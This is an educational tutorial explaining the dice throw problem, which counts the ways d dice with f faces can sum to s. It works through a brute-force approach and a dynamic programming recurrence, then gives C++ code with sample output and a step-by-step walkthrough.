where “XXX.XXX.XXX.XXX” is either an IP address or, for your own page, the text “this IP address” (assuming your latest activity was from your current machine).
IP addresses can be used for geolocation – we’ll see how shortly. The problem is that they are only present when logged into BioStar, which uses OpenID for authentication. So to write code which automates the collection of user IP addresses, you’d have to convince BioStar that you were logged in.
I’m sure that it’s possible to write code which stores OAuth credentials and sends them to BioStar, but it would take some time to develop. So instead, I used a very ugly and largely manual approach. First, I wrote this simple Greasemonkey script:
// ==UserScript== // @name BioStar IP // @namespace // @description Get user IP // @include* // ==/UserScript== var d; d = document.evaluate("//div[@class='summaryinfo']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); console.log(d.snapshotItem(0).innerHTML);
It captures the content of the DIV with class summaryinfo and writes it to the Javascript console. That content looks something like this:
Last activity: <span title="2010-10-03 23:06:52Z UTC" class="relativetime">Oct 3 at 23:06</span> from XXX.XXX.XXX.XXX
Again, XXX.XXX.XXX.XXX is the IP address.
So I opened Firefox, installed the Greasemonkey and Firebug extensions, installed my user script, navigated to the BioStar users page, opened the Firebug console and started clicking through users. By choosing “Persist” and increasing the console log limit, I was able to record the IP address of each user in the console. When finished, I copied the console contents to a text file.
There is no worse solution, for a bioinformatician, than one that involves manual labour, copy and paste. Currently, there are 17 pages of users (16 x 35 + 1 x 11 = 571 total). My file contains 567 of them: at least one did not display an IP address and perhaps I missed a couple. This is why we learn to script.
2. Location using GeoIP
So how do we find location using IP? The answer is GeoIP.
First, head over to the MaxMind website and download their GeoIP C API. I installed it (for Ubuntu) like so:
wget tar zxvf GeoIP.tar.gz cd GeoIP-1.4.6 ./configure --prefix=/opt/GeoIP make sudo make install # install the city database wget gunzip GeoLiteCity.dat.gz sudo mv GeoLiteCity.dat /opt/GeoIP/share/GeoIP/
GeoIP comes with a free database of countries, located in /opt/GeoIP/share/GeoIP/GeoIP.dat. I also installed their free city database, as shown above.
Next, the Ruby gem for GeoIP:
[sudo] gem install mtodd-geoip -s -- --with-geoip-dir=/opt/GeoIP
Now, quick and very dirty Ruby code to read the text file containing IP addresses and look them up in the GeoIP database:
require "rubygems" require "geoip" ip = "ip.txt" # the text file containing IPs, copied from console.log db = GeoIP::City.new("/opt/GeoIP/share/GeoIP/GeoLiteCity.dat") File.read(ip).each do |line| line.chomp if line =~/froms+(d+.d+.d+.d+)/ locn = [] lookup = db.look_up($1) locn.push(lookup[:country_name], lookup[:country_code], lookup[:city], lookup[:latitude], lookup[:longitude]) puts locn.join("t") end end
That prints out a tab-delimited file, which looks like this:
United States US East Lansing 42.7282981872559 -84.4881973266602 Italy IT Rome 41.9000015258789 12.4833002090454 Portugal PT Fafe 41.4500007629395 -8.16670036315918 China CN Wuhan 30.5832996368408 114.266700744629 United States US Oklahoma City 35.4715003967285 -97.5189971923828 ...
3. Plotting maps using R
Before we go all Google-y, let’s look at plotting geographical data using R. There are many libraries and mapping solutions, but here’s a simple script to plot our users on a world map. It requires the packages ggplot2 and maps. Assuming that the output from the Ruby script is saved in a file, biostar.tab:
library(ggplot2) library(maps) biostar <- read.table("biostar.tab", header = F, stringsAsFactors = F, sep = "t") colnames(biostar) <- c("country", "code", "city", "lat", "long") world <- map_data("world") png(file = "biostar.png", width = 1024, height = 768) print(ggplot(world, aes(long, lat)) + geom_polygon(aes(group = group), fill = "darkslategrey") + geom_point(data = biostar, aes(long, lat), colour = "red") + scale_colour_discrete(legend = FALSE)) dev.off()
4. Plotting on a Google Map
There are many options for getting data into Google Maps. I figured that there must be a site where you can upload a simple CSV file containing latitude + longitude and display a Google Map. There is – it’s called ZeeMaps. It has many features – some free, some paid – which I’m yet to investigate fully.
Of course, IPs can be spoofed, users move around and the location of a machine might not reflect the location of the user. However, I think it’s a more reliable geolocation approach than an arbitrary text description. Now, if I could just automate that IP-harvesting code…
Filed under: bioinformatics, greasemonkey, programming, R, ruby, statistics Tagged: biostar, geolocation, google maps, javascript,... | http://www.r-bloggers.com/biostar-users-of-the-world-unite/ | CC-MAIN-2015-22 | refinedweb | 861 | 66.84 |
C-Reduce takes a C or C++ file that triggers a bug in a compiler (or other tool that processes source code) and turns it into the smallest possible test case that still triggers the bug. Most often, we try to reduce code that has already been preprocessed. This post is about how to reduce non-preprocessed code, which is sometimes necessary when — due to use of an integrated preprocessor — the compiler bug goes away when a separate preprocessing step is used.
The first thing we need to do is get all of the necessary header files into one place. This is somewhat painful due to things like computed includes and #include_next. I wrote a script that follows the transitive includes, renaming files and copying them over; it works fine on Linux but sometimes fails on OS X, I haven’t figured out why yet. Trust me that you do not want to look too closely at the Boost headers.
Second, we need to reduce multiple files at once, since they have not yet been glommed together by the preprocessor. C-Reduce, which is a collection of passes that iterate to fixpoint, does this by running each pass over each file before proceeding to the next pass. The seems to work well. A side benefit of implementing multi-file reduction is that it has other uses such as reducing programs that trigger link-time optimization bugs, which inherently requires multiple files.
Non-preprocessed code contains comments, so C-Reduce has a special pass for stripping those out. We don’t want to do this before running C-Reduce because removing comments might make the bug we’re chasing go away. Another pass specifically removes #include directives which tend to be deeply nested in some C++ libraries.
#ifdef … #endif pairs are hard to eliminate from first principles because they are often not located near to each other in the file being reduced, but you still need to eliminate both at once. At first this sounded like a hard problem to solve but then I found Tony Finch’s excellent unifdef tool and wrote a C-Reduce pass that simply calls it for every relevant preprocessor symbol.
Finally, it is often the case that a collection of reduced header files contains long chains of trivial #includes. C-Reduce fixes these with a pass that replaces an #include with the included text when the included file is very small.
What’s left to do? The only obvious thing on my list is selectively evaluating the substitutions suggested by #define directives. I will probably only do this by shelling out to an external tool, should someone happen to write it.
In summary, reducing non-preprocessed code is not too hard, but some specific support is required in order to do a good job of it. If you have a testcase reduction problem that requires multi-file reduction or needs to run on non-preprocessed code, please try out C-Reduce and let us know — at the creduce-dev mailing list — how it worked. The features described in this post aren’t yet in a release, just build and install our master branch.
As a bonus, since you’re dying to know, I’ll show you what C-Reduce thinks is the minimal hello world program in C++11. From 127 header files + the original source file, it creates 126 empty files plus this hello.cpp:
#include "ostream" namespace std { basic_ostream
cout; ios_base::Init x0; } int main() { std::cout << "Hello"; }
And this ostream:
namespace { typedef __SIZE_TYPE__ x0; typedef __PTRDIFF_TYPE__ x1; } namespace std { template < class > struct char_traits; } typedef x1 x2; namespace std { template < typename x3, typename = char_traits < x3 > >struct basic_ostream; template <> struct char_traits
{ typedef char x4; static x0 x5 ( const x4 * x6 ) { return __builtin_strlen ( x6 ); } }; template < typename x3, typename x7 > basic_ostream < x3, x7 > &__ostream_insert ( basic_ostream < x3, x7 > &, const x3 *, x2 ); struct ios_base { struct Init { Init ( ); }; }; template < typename, typename > struct basic_ostream { }; template < typename x3, typename x7 > basic_ostream < x3 > operator<< ( basic_ostream < x3, x7 > &x8, const x3 * x6 ) { __ostream_insert ( x8, x6, x7::x5 ( x6 ) ); return x8; } }
It's obviously not minimal but believe me we have already put a lot of work into domain-specific C++ reduction tricks. If you see something here that can be gotten rid of and want to take a crack at teaching our clang_delta tool to do the transformation, we'll take a pull request. | https://blog.regehr.org/archives/1278 | CC-MAIN-2019-39 | refinedweb | 731 | 54.56 |
WET Dilutes Performance Bottlenecks
From WikiContent
The importance of the DRY principle (Don't Repeat Yourself) is that codifies the idea that every piece of knowledge in a system should have a singular representation. This translates to; knowledge should be contained in a single implementation. The antitheses of DRY is WET (Write Every Time). Our code is WET when knowledge is codified in several different implementations. The performance implications of DRY versus WET become very clear when you consider their numerous effects on a performance profile.
Lets start by considering a feature of our system, say X, that is a CPU bottleneck. Let's say feature X consumes 30% of the CPU. Now let's say that feature X has 10 different implementations. On average, each implementation will consume 3% of the CPU. As this is level of CPU utilization isn't worth considering if we are looking for a quick win, it is unlikely that we'd miss that this feature is our bottleneck. Let say that for some magical reason we have recognized feature X as a bottleneck. Now we are left with the problem of finding and fixing every single implementation. With WET, we have 10 different implementations that we need to find and fix. With DRY we'd clearly see the 30% CPU utilization and we'd have 1/10 the code to fix. Was it mentioned that we don't have to spend time looking for each implementation?
There is one use case where we are often guilty of violating DRY. That is in our use of collections. Let's say we are working with customer data.(float(float amount) { return customersSortedBySpendingLevel.elementsLargerThan(amount); } }
public class UsageExample { public static void main(String[] args) { CustomerList customers = new CustomerList(); // ... CustomerList customersOfInterest = customers.findCustomersThatSpendAtLeast(500.00); } } | http://commons.oreilly.com/wiki/index.php?title=WET_Dilutes_Performance_Bottlenecks&oldid=12909 | CC-MAIN-2015-06 | refinedweb | 298 | 57.98 |
MaliputRailcar models a vehicle that follows a maliput::api::Lane as if it were on rails and neglecting all physics. More...
#include <drake/automotive/maliput_railcar.h>
MaliputRailcar models a vehicle that follows a maliput::api::Lane as if it were on rails and neglecting all physics.
Parameters:
State vector:
Abstract state:
Input Port Accessors:
Output Port Accessors:
X_WC, where
Cis the car frame and
Wis the world frame.
V_WC_W, where
Cis the car frame and
Wis the world frame. Currently the rotational component is always zero, see #5751.
Instantiated templates for the following ScalarTypes are provided:
They are already available to link against in the containing library.
The constructor.
Getter methods for input and output ports.
Returns a mutable reference to the parameters in the given
context.
Defines a distance that is "close enough" to the end of a lane for the vehicle to transition to an ongoing branch.
The primary constraint on the selection of this variable is the application's degree of sensitivity to position state discontinuity when the MaliputRailcar "jumps" from its current lane to a lane in an ongoing branch. A smaller value results in a smaller spatial discontinuity. If this value is zero, the spatial discontinuity will be zero. However, it will trigger the use of kTimeEpsilon, which results in a temporal discontinuity.
Defines a time interval that is used to ensure a desired update time is always greater than (i.e., after) the current time.
Despite the spatial window provided by kLaneEndEpsilon, it is still possible for the vehicle to end up precisely at the end of its current lane (e.g., it could be initialized in this state). In this scenario, the next update time will be equal to the current time. The integrator, however, requires that the next update time be strictly after the current time, which is when this constant is used. The primary constraint on the selection of this constant is the application's sensitivity to a MaliputRailcar being "late" in its transition to an ongoing branch once it is at the end of its current lane. The smaller this value, the less "late" the transition will occur. This value cannot be zero since that will violate the integrator's need for the next update time to be strictly after the current time. | http://drake.mit.edu/doxygen_cxx/classdrake_1_1automotive_1_1_maliput_railcar.html | CC-MAIN-2018-43 | refinedweb | 383 | 54.32 |
One of the main reason that allowed us to developp the current notebook web application was to embrase the web technology.
By beeing a pure web application using HTML, Javascript and CSS, the Notebook can get all the web technology improvement for free. Thus, as browsers support for different media extend, The notebook web app should be able to be compatible without modification.
This is also true with performance of the User Interface as the speed of javascript VM increase.
The other advantage of using only web technology is that the code of the interface is fully accessible to the end user, and modifiable live. Even if this task is not always easy, we strive to keep our code as accessible and reusable as possible. This should allow with minimum effort to develop small extensions that customize the behavior of the web interface.
The first tool that is availlable to you and that you shoudl be aware of are browser "developpers tool". The exact naming can change across browser, and might require the installation of extensions. But basically they can allow you to inspect/modify the DOM, and interact with the javascript code that run the frontend.
Those will be your best friends to debug and try different approach for your extensions.
Above tools can be tedious to edit long javascipt files. Hopefully we provide the
%%javascript magic. This allows you to quickly inject javascript into the notebook. Still the javascript injected this way will not survive reloading. Hence it is a good tool for testing an refinig a script.
You might see here and there people modifying css and injecting js into notebook by reading file and publishing them into the notebook. Not only this often break the flow of the notebook and make the re-execution of the notebook broken, but it also mean that you need to execute those cells on all the notebook every time you need to update the code.
This can still be usefull in some cases, like the
%autosave magic that allows to control the time between each save. But this can be replaced by a Javascript dropdown menu to select save interval.
## you can inspect the autosave code to see what it does. %autosave??
To inject Javascript we provide an entry point:
custom.js that allow teh user to execute and load other resources into the notebook.
Javascript code in
custom.js will be executed when the notebook app start and can then be used to customise almost anything in the UI and in the behavior of the notebook.
custom.js can be found in IPython profile dir, and so you can have different UI modification on a per profile basis, as well as share your modfication with others.
You have been provided with an already existing profile folder with this tutorial... start the notebook from the root of the tutorial directory with :
$ ipython notebook --ProfileDir.location=./profile_euroscipy
profile_dir = ! ipython locate profile_dir = profile_dir[0] profile_dir
and custom js is in
import os.path custom_js_path = os.path.join(profile_dir,'profile_default','static','custom','custom.js')
# my custom js with open(custom_js_path) as f: for l in f: print l,
Note that
custom.js is ment to be modified by user, when writing a script, you can define it in a separate file and add a line of configuration into
custom.js that will fetch and execute the file.
Warning : even if modification of
custom.js take effect immediately after browser refresh (except if browser cache is aggressive), creating a file in
static/ directory need a server restart.
Create a
custom.js in the right location with the following content:
alert("hello world from custom.js")
Restart your server and open any notebook.
We've seen above that you can change the autosave rate by using a magic. This is typically something I don't want to type everytime, and that I don't like to embed into my workwlow and documents. (reader don't care what my autosave time is), let's build an extension that allow to do it.
Create a dropdow elemement in the toolbar (DOM
IPython.toolbar.element), you will need
IPython.notebook.set_autosave_interval(miliseconds) // ... }
I like my cython to be nicely highlighted
traitlets.config.cell_magic_highlight['magic_text/x-cython'] = {} traitlets.
Sadly you will have to read the js source file (but there are lots of comments) an/or build the javascript documentation using yuidoc.
If you have
node and
yui-doc installed:
$ cd ~/ipython/IPython/html/static/notebook/js/ $ yuidoc . --server warn: (yuidoc): Failed to extract port, setting to the default :3000 info: (yuidoc): Starting [email protected] using [email protected] with [email protected] docs
By browsing the doc you will see that we have soem convenience methods that avoid to re-invent the UI everytime :
IPython.toolbar.add_buttons_group([ { 'label' : 'run qtconsole', 'icon' : 'icon-terminal', // select your icon from // 'callback': function(){IPython.notebook.kernel.execute('%qtconsole')} } // add more button here if needed. ]);
with a lot of icons you can select from.
The most requested feature is generaly to be able to distinguish individual cell in th enotebook, or run specific action with them.
To do so, you can either use
IPython.notebook.get_selected_cell(), or rely on
CellToolbar. This allow you to register aset of action and graphical element that will be attached on individual cells.
You can see some example of what can be done by toggling the
Cell Toolbar selector in the toolbar on top of the notebook. It provide two default
presets that are
Default and
slideshow. Default allow edit the metadata attached to each cell manually.
First we define a function that takes at first parameter an element on the DOM in which to inject UI element. Second element will be the cell this element will be registerd with. Then we will need to register that function ad give it a name.
%%javascript var CellToolbar = IPython.CellToolbar var toggle = function(div, cell) { var button_container = $(div) // let's create a button that show);
This function can now be part of many
preset of the CellToolBar.
%%javascript IPython.CellToolbar.register_preset('Tutorial 1',['tuto.foo','default.rawedit']) IPython.CellToolbar.register_preset('Tutorial 2',['slideshow.select','tuto.foo'])
You should now have access to two presets :
And check that the buttons you defin share state when you toggle preset. Check moreover that the metadata of the cell is modified when you clisk the button, and that when saved on reloaded the metadata is still availlable.
Try to wrap the all code in a file, put this file in
{profile}/static/custom/<a-name>.js, and add
require(['custom/<a-name>']);
in
custom.js to have this script automatically loaded in all your notebooks.
require is provided by a javascript library that allow to express dependency. For simple extension like the previous one we directly mute the global namespace, but for more complexe extension you could pass acallback'); })
Try to use the following to bind a dropdown list to
cell.metadata.difficulty.select.
It should be able to take the 4 following values :
<None>
Easy
Medium
Hard
We will use it to customise the output of the converted notebook depending of the tag on each cell
%load soln/celldiff.js | https://nbviewer.jupyter.org/github/ipython/ipython/blob/rel-4.0.1/examples/Notebook/JavaScript%20Notebook%20Extensions.ipynb | CC-MAIN-2019-18 | refinedweb | 1,195 | 55.44 |
This section will give you examples of how divert sockets can be used and how they are different of other packet interception mechanisms out there.
There are other mechanisms out there that have similar functionality. Here is why they are different:
Netlink sockets can intercept packets just like divert sockets by using firewall filter. They have a special type (AF_NETLINK) and on the surface seem to do the same thing. Two major differences are:
RAW sockets can be a good way to listen in on traffic (especially under Linux, where RAW sockets can listen in on TCP and UDP traffic, although most other UNI*s do not allow that) but a RAW socket can't stop a packet from propagating through the IP stack - it simply gives you a copy of the packet and there is no way to inject it inbound (on the way up the stack) - only outbound. Also, you can only filter pockets out by the protocol number, which you specify when you open a RAW socket. There is no link between the firewall and RAW sockets.
More commonly known for the tool it facilitates - tcpdump, libpcap lets you listen in on traffic that hits your interface (whether it be ppp or eth or whatever). For ethernet it can also put your NIC into a promiscuous mode, so that it will forward to IP the traffic that not only is link-layer addressed to it, but to others on the same segment. Of course, libpcap allows for no way of actually stopping packets from propagating and no way to inject. In fact, libpcap is in many ways orthogonal to divert sockets.
Linux provides you with three default chains: input, output and forward. There are also accounting chains, but they are of no consequence here. Depending on the packet origin it traverses one or more of these chains:
is traversed by all packets that come into the host - packets that are addressed to it and packets that will be forwarded by it.
is traversed by all packets originating in the host and by all forwarded packets
is traversed only by the forwarded packets.
The order in which a forwarded packet traverses the chains is:
As a rule of thumb, forward chain should only be used to filter packets that are forwarded and are not originating and are not addressed to your host. If you are interested in a combination of both forwarded packets and packets that are originating or addressed to your host, then use input or output chain instead. Intercepting on forward and input or output chain for the same type of packet at the same time will create problems in reinjection and, more importantly, is unnecessary.
The patched version of ipchains that you will need to retrieve from the website, is the tool that allows you to modify firewall rules from a shell (most people want that). It is also possible to set up firewall rules programmatically. See the example code for this - setting up a DIVERT rule would be similar to setting up a REDIRECT rule - specify DIVERT as a target and the divert port and you are set to go.
The ipchains syntax for setting up firewall rules remains the same. To specify a
DIVERT rule you must specify
-j DIVERT <port num> as a target, everything else
remains the same. For instance
would set up a divert rule for ICMP packets to be diverted from input chain to a port 1234.would set up a divert rule for ICMP packets to be diverted from input chain to a port 1234.
ipchains -A input -p ICMP -j DIVERT 1234
The following section explains how to use ipchains in conjunction with an interceptor user-space program.
Here is an example program that reads packets from a divert socket, displays them and then reinjects them back. It requires that the divert port is specified on the command line.
#include <stdio.h> #include <errno.h> #include <limits.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <getopt.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <signal.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/udp.h> #include <net/if.h> #include <sys/param.h> #include <linux/types.h> #include <linux/icmp.h> #include <linux/ip_fw.h> #define IPPROTO_DIVERT 254 #define BUFSIZE 65535 char *progname; #ifdef FIREWALL char *fw_policy="DIVERT"; char *fw_chain="output"; struct ip_fw fw; struct ip_fwuser ipfu; struct ip_fwchange ipfc; int fw_sock; /* remove the firewall rule when exit */ void intHandler (int signo) { if (setsockopt(fw_sock, IPPROTO_IP, IP_FW_DELETE, &ipfc, sizeof(ipfc))==-1) { fprintf(stderr, "%s: could not remove rule: %s\n", progname, strerror(errno)); exit(2); } close(fw_sock); exit(0); } #endif int main(int argc, char** argv) { int fd, rawfd, fdfw, ret, n; int on=1; struct sockaddr_in bindPort, sin; int sinlen; struct iphdr *hdr; unsigned char packet[BUFSIZE]; struct in_addr addr; int i, direction; struct ip_mreq mreq; if (argc!=2) { fprintf(stderr, "Usage: %s <port number>\n", argv[0]); exit(1); } progname=argv[0]; fprintf(stderr,"%s:Creating a socket\n",argv[0]); /* open a divert socket */ fd=socket(AF_INET, SOCK_RAW, IPPROTO_DIVERT); if (fd==-1) { fprintf(stderr,"%s:We could not open a divert socket\n",argv[0]); exit(1); } bindPort.sin_family=AF_INET; bindPort.sin_port=htons(atol(argv[1])); bindPort.sin_addr.s_addr=0; fprintf(stderr,"%s:Binding a socket\n",argv[0]); ret=bind(fd, &bindPort, sizeof(struct sockaddr_in)); if (ret!=0) { close(fd); fprintf(stderr, "%s: Error bind(): %s",argv[0],strerror(ret)); exit(2); } #ifdef FIREWALL /* fill in the rule first */ bzero(&fw, sizeof (struct ip_fw)); fw.fw_proto=1; /* ICMP */ fw.fw_redirpt=htons(bindPort.sin_port); fw.fw_spts[1]=0xffff; fw.fw_dpts[1]=0xffff; fw.fw_outputsize=0xffff; /* fill in the fwuser structure */ 
ipfu.ipfw=fw; memcpy(ipfu.label, fw_policy, strlen(fw_policy)); /* fill in the fwchange structure */ ipfc.fwc_rule=ipfu; memcpy(ipfc.fwc_label, fw_chain, strlen(fw_chain)); /* open a socket */ if ((fw_sock=socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==-1) { fprintf(stderr, "%s: could not create a raw socket: %s\n", argv[0], strerror(errno)); exit(2); } /* write a rule into it */ if (setsockopt(fw_sock, IPPROTO_IP, IP_FW_APPEND, &ipfc, sizeof(ipfc))==-1) { fprintf(stderr, "%s could not set rule: %s\n", argv[0], strerror(errno)); exit(2); } /* install signal handler to delete the rule */ signal(SIGINT, intHandler); #endif /* FIREWALL */ printf("%s: Waiting for data...\n",argv[0]); /* read data in */ sinlen=sizeof(struct sockaddr_in); while(1) { n=recvfrom(fd, packet, BUFSIZE, 0, &sin, &sinlen); hdr=(struct iphdr*)packet; printf("%s: The packet looks like this:\n",argv[0]); for( i=0; i<40; i++) { printf("%02x ", (int)*(packet+i)); if (!((i+1)%16)) printf("\n"); }; printf("\n"); addr.s_addr=hdr->saddr; printf("%s: Source address: %s\n",argv[0], inet_ntoa(addr)); addr.s_addr=hdr->daddr; printf("%s: Destination address: %s\n", argv[0], inet_ntoa(addr)); printf("%s: Receiving IF address: %s\n", argv[0], inet_ntoa(sin.sin_addr)); printf("%s: Protocol number: %i\n", argv[0], hdr->protocol); /* reinjection */ #ifdef MULTICAST if (IN_MULTICAST((ntohl(hdr->daddr)))) { printf("%s: Multicast address!\n", argv[0]); addr.s_addr = hdr->saddr; errno = 0; if (sin.sin_addr.s_addr == 0) printf("%s: set_interface returns %i with errno =%i\n", argv[0], setsockopt(fd, IPPROTO_IP, IP_MULTICAST_IF, &addr, sizeof(addr)), errno); } #endif #ifdef REINJECT printf("%s Reinjecting DIVERT %i bytes\n", argv[0], n); n=sendto(fd, packet, n ,0, &sin, sinlen); printf("%s: %i bytes reinjected.\n", argv[0], n); if (n<=0) printf("%s: Oops: errno = %i\n", argv[0], errno); if (errno == EBADRQC) printf("errno == EBADRQC\n"); if (errno == ENETUNREACH) printf("errno == ENETUNREACH\n"); #endif } }
You can simply cut-n-paste the code and compile it with your favorite compiler. If you want to enable reinjection - compile it with the -DREINJECT flag, otherwise it will only do the interception.
In order to get it to work, compile the kernel and ipchains-1.3.8 as described above. Insert a rule into any of the firewall chains: input, output or forward, then send the packets that would match the rule and watch them as they fly through the screen - your interceptor program will display them and then reinject them back, if appropriately compiled.
For example:
will divert and display all TCP packets originating on host 172.16.128.10 (for instance if your host is a gateway). It will intercept them on the output just before they go on the wire.will divert and display all TCP packets originating on host 172.16.128.10 (for instance if your host is a gateway). It will intercept them on the output just before they go on the wire.
ipchains -A output -p TCP -s 172.16.128.10 -j DIVERT 4321 interceptor 4321
If you did not compile the pass through option into the kernel, then inserting the rule effectively will create a DENY rule in the firewall for the packets you specified until you start the interceptor program. See more on that above
If you want to set a firewall rule through your program, compile it with -DFIREWALL option and it will divert all ICMP packets from the output chain. It will also remove the DIVERT rule from the firewall when you use Ctrl-C to exit the program. In this case using pass-through vs. non-pass-through divert sockets makes virtually no difference.
As far as what you can use divert sockets for - your imagination would be the limiting factor. I would be interested to hear about applications that utilize divert sockets.
So, have fun! | http://www.redhat.com/mirrors/LDP/HOWTO/Divert-Sockets-mini-HOWTO-6.html | CC-MAIN-2013-20 | refinedweb | 1,579 | 54.83 |
At the moment, I am creating this program to ask the user for input. The user will give a number (to be added to sum and then divided by n to find the mean) or the letter "e" (to terminate the program). The program should take multiple numbers until an "e" is given.
This is the underlying concept but I'm not really there yet. I'm having some trouble getting my main and Scanner to cooperate so any help would be appreciated, thank you.
//package homework1; import java.util.Scanner; public class hmwk1 { public static void main(String[] args) { partA(); } public static void partA() { int n = 0; double mean = 0; double sum = 0; String input; System.out.println("Enter a number or enter 'e' to quit:"); Scanner kb = new Scanner(System.in); input = kb.next(); while(!(input.equals("e"))) { if(!(input.equals("e"))) { double d = Double.parseDouble(input); if(d >= 10 && d <= 100) { sum += d; n++; } else { System.out.println("Not in range"); } } /*System.out.println("Enter a number or enter 'e' to quit:"); String input2 = kb.next(); if(!input2.equals("e")) { double d = Double.parseDouble(input); }*/ } mean = sum / n; System.out.println(mean); System.exit(0); } } | http://www.javaprogrammingforums.com/whats-wrong-my-code/35631-experiencing-problems-w-scanner-main-open-any-assistance.html | CC-MAIN-2015-11 | refinedweb | 198 | 52.15 |
Java Puzzle: Square Root
Show your Java-fu by calculating the unknown.
Written by Wouter Coekaerts.
There are several algorithms to calculate a square root. But to solve this puzzle, you’ll need a different approach.
Can you find the square root of a huge number, without even looking at it?
package square**;** import java.math.BigInteger; import java.security.SecureRandom; public class SquareRoot { public static final int BITS = 10000; private static BigInteger n = new BigInteger(BITS, new SecureRandom()).pow(2); public static void answer(BigInteger root) { if (n.divide(root).equals(root)) { // The goal is to reach this line System.out.println("Square root!"); } } }
Write a class that calls SquareRoot.answer, and reaches that line in the code. The rules:
- Using setAccessible takes all the fun out of the problem, so your code must run with the security manager enabled (java -Djava.security.manager your.Class).
- Solve the problem in a single separate .java file which compiles and runs with JDK 6 or 7.
- Finding and exploiting security vulnerabilities in the JDK itself is interesting, but not the point of this puzzle.
Put your solution in a secret gist, and add a link to it in a comments below. To give everyone a chance to participate without spoilers the comments will stay private for a week.
Good luck!
Update: See this post about the solution Wouter Coekaerts Follow the latest activity of Wouter Coekaerts on Medium to see their stories and recommends.medium.com | https://developer.squareup.com/blog/java-puzzle-square-root/ | CC-MAIN-2019-26 | refinedweb | 245 | 59.6 |
Dice Throw Problem (Dynamic Programming)
Get FREE domain for 1st year and build your brand new site
There are d dice each having f faces. We need to find the number of ways in which we can get sum s from the faces when the dice are rolled.
Let us first understand the problem with an example-
- If there are 2 dice with 2 faces, then to get the sum as 3, there can be 2 ways-
- 1st die will have the value 1 and 2nd will have 2.
- 1st die will be faced with 2 and 2nd with 1.
Hence, for f=2, d=2, s=3, the answer will be 2.
Approach -
1) BRUTE FORCE -
The naive approach is to find all the possible combinations using for loops for each dice and then calculating the sum of all the faces, to check if we get the value as s. We will use another variable to keep count of how many times we get sum as s, and the value of this count variable will be our answer.
However, this approach is very time consuming and lengthy and its time complexity will depend on the number of dice.
Time complexity: O(d^2 * f) as:
- There are d * f combinations
- For each combination, we will need O(d) time to get the sum
2) DP Approach -
We can solve this problem efficiently with Dynamic Programming. For that, we need to first understand the basic structure -
Let the function for number of ways to find sum s from d dice with f faces be Sum(f,d,s)
Sum(f,d,s) = [getting sum (s-1) from (d-1) dice when dth die has value 1] + [getting sum(s-2) from (d-1) dice when dth die has value 2] + [getting sum(s-3) from (d-1) dice when dth die has value 3] + ................................................................. + [getting sum(s-f) from (d-1) dice when dth die has value f]
The dth die can have the maximum value f as there are only f faces in the dice.
Let us understand this concept with an example :
- f = 5, d = 3, s = 8
Hence, we have 3 dice with 5 faces, and we need to find the number of ways to get the sum as 8.
Sum(5,3,8) = 3rd die getting 1 + 3rd die getting 2 + 3rd die getting 3 + ...... + 3rd die getting 5 Sum(5,3,8) = Sum(5,2,7) + Sum(5,2,6) + Sum(5,2,5) + Sum(5,2,4) + Sum(5,2,3) //The 3rd die can have maximum value of 5, as there are 5 faces. Hence we'll stop at Sum(5,2,3) Also, Sum(5,3,7) = Sum(5,2,6) + Sum(5,2,5) + Sum(5,2,4) + Sum(5,2,3) + Sum(5,2,2) //With 2 dice, the minimum sum must be 2. Hence, we get- Sum(5,3,8) = Sum(5,3,7) + Sum(5,2,7) Therefore, in general terms - Sum(f,d,s) = Sum(f,d,s-1) + Sum(f,d-1,s-1) We can further find Sum(5,2,7) as- Sum(5,2,7) = Sum(5,1,6) + Sum(5,1,5) + Sum(5,1,4) + Sum(5,1,3) + Sum(5,1,2) However, Sum(5,1,6) = 0, as we can't have a sum of 6 with 1 die having 5 faces. Therefore, Sum(5,2,7) = Sum(5,1,5) + Sum(5,1,4) + Sum(5,1,3) + Sum(5,1,2)
This process continues throughout the whole equation.
- Sum(f,1,s) will always be 1 when s<=f, as with one die, there is only one way to get sum s.
- Sum(f,1,s) will be 0 when s>f, as there are not sufficient number of faces or dice, to get sum s. So, there are 0 ways.
Hence, is our example -
Sum(5,2,7) = 1 + 1 + 1 + 1 = 4
In this way, we can call each function and eventually find the Sum(5,3,8). We will store all the values in a 2d table[i][j] where i will go upto d and j will upto s. We will use this dp table[i][j] to find other values and so on..
Hence, we need a base value-
Sum(f,0,0) = 1
i.e table[0][0] = 1
- Time Complexity: O(n * x)
where n is number of dice and x is given sum.
Code
The following is the code of the abouve problem in C++
#include<bits/stdc++.h> using namespace std; long numOfWays(int f, int d, int s) { //Creata a 2d table with one extra row and column for simplicity. long table[d + 1][s + 1]; //Initialise the table with 0. memset(table,0,sizeof table); // Base value table[0][0] = 1; // Iterate over dice for (int i = 1; i <= d; i++) { // Iterate over sum for (int j = i; j <= s; j++) { //general equation to obtain Sum(f,s,d) table[i][j] = table[i][j - 1] + table[i - 1][j - 1]; //Some extra values are added when j>f // i.e when sum to be found is greater than the number of faces. // Such values need to removed. if (j > f) table[i][j] -= table[i - 1][j - f - 1]; } } return table[d][s]; } int main(){ cout << numOfWays(4, 2, 1) << endl; cout << numOfWays(2, 2, 3) << endl; cout << numOfWays(6, 3, 8) << endl; cout << numOfWays(5, 3, 8) << endl; cout << numOfWays(4, 2, 5) << endl; cout << numOfWays(4, 3, 5) << endl; }
Output -
0 2 21 18 4 6
Workflow -
Let us walkthrough the code with our previous example - Sum(5,3,8)
We are using nested for loops to traverse through the table, where i denotes number of dice, and j denotes the sum to find.
We are computing the sum and storing it in the table with our general formula-
Sum(f,d,s) = Sum(f,d,s-1) + Sum(f,d-1,s-1)
Hence,
table[i][j] = table[i][j-1] + table[i-1][j-1]
We are starting from i=1 and j=1, and finding all the values of table[i][j] till we reach i=d and j=s.
However, for some cases, extra values are added according to this general equation.
- For example, from our code, we can see that -
Sum(5,1,6) = Sum(5,1,5) + Sum(5,0,5) = 1
table[1][6] = table[1][5] + table[0][5] = 1 + 0 = 1
But with 1 die having 5 faces, we can't get a sum of 6.
This extra value is removed by checking the if condition-
If (j>f) i.e 6>5
hence, table[1][6] = table[1][6] - table[0][0] = 1-1 = 0
As we traverse through the 2 loops, we will calculate the value of the number of ways and store it in table[i][j] to find further values.
Hence, we will get the final answer for Sum(5,3,8) from table[3][8].
table[3][8] = 18
